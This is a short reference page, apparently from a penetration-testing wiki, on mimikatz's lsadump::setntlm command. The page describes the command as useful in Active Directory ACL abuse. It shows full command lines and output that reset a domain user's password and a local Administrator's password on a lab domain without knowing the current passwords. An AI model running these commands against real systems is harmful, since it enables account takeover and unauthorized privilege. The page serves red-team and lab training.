setntlm
lsadump::setntlm can be used to perform a password reset without knowing the user's current password. It can be useful during an active directory Access Control (ACL) abuse scenario. It has the following command line arguments:
- /ntlm: The new NT hash for the target user
- /user: The username of the account to target
- /password: The new password for the target user
- /server: hostname of the target server
Reset for a Domain User
mimikatz # lsadump::setntlm /user:optimus /password:VeryStrongPass1! /server:dc.hacklab.local
NTLM         : 7cb0b13a4661116dd2c306fb2f4536b2
Target server: dc.hacklab.local
Target user  : optimus
Domain name  : hacklab
Domain SID   : S-1-5-21-2725560159-1428537199-2260736313
User RID     : 1732
>> Informations are in the target SAM!Reset for a Local User
mimikatz # lsadump::setntlm /user:Administrator /password:Super_SecretPass1! /server:Win10.hacklab.local
NTLM         : b09a14d2d325026f8986d4a874fbcbc7
Target server: Win10.hacklab.local
Target user  : Administrator
Domain name  : WIN10
Domain SID   : S-1-5-21-1604892360-3618202543-1602915806
User RID     : 500
>> Informations are in the target SAM!Last updated
